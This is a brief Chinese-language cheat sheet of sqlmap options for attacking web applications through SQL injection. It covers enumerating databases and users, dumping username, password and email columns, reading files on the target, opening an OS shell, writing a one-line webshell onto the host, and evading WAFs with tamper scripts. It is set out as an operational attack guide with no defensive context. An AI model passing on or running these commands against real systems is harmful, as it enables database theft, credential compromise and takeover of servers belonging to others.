获取数据命令
--dbs 自动的探测web应用后端数据库类型:MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2(注意:如果不是root用户不能看到所有库)
--current-user:大多数数据库中可检测到数据库管理系统当前用户
--current-db:当前连接数据库名
--is-dba:判断当前的用户是否为管理
--users:列出数据库所有所有用户
获取表名
--tables -D 数据库名
获取字段名
--columns -T user -D abc
获取数据内容,就是脱库,慎用
-T user -C username,password,email --dump
读文件内容
--file-read 对方文件目录文件名
系统交互shell ,要找一个布尔型的盲注点运行比较快
--os-shell
时间型的注入等的久
写webshell
--file-write "D:/3.txt” --file-dest “C:/phpStudy/3.txt” -v1
本地D:/3.txt写入到宿主机的目录和文件名C:/phpStudy/3.txt,v1是显示细节。所以3.txt这个可以写一句话木马,就可以进行连接攻击了
过waf,本质是编码好的一些脚本绕过waf
--tamper "脚本"
脚本使用的时候找到对应的名称即可,会在url里面加密